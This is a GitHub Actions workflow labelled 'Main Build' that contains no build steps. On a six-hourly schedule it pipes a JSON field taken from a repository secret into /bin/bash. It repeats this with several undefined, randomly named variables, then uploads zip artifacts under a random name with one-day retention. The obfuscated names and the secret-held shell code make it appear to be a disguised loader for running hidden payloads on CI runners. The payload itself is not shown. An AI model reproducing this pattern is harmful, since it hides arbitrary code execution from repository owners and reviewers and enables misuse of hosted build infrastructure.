name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '12 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          pmpp784: ${{ secrets.pmpp784 }}
        run: |
          printf '%s' "$pmpp784" | jq -r .xxjri011 | /bin/bash
          printf '%s' "$y8189" | jq -r .t4 | /bin/bash
          echo $gro63364 | jq -r .p52 | /bin/bash
          printf '%s' "$cs42865" | jq -r .y18 | /bin/bash
          printf '%s' "$lwnw594" | jq -r .u91344 | /bin/bash
          echo $n30 | jq -r .f59355 | /bin/bash
          printf '%s' "$zh260" | jq -r .auo97121 | /bin/bash
          printf '%s' "$becbg33" | jq -r .oodgu04301 | /bin/bash
          echo $qvdk3 | jq -r .zn828 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: 5YTuptJg
          path: "*.zip"
          retention-days: 1
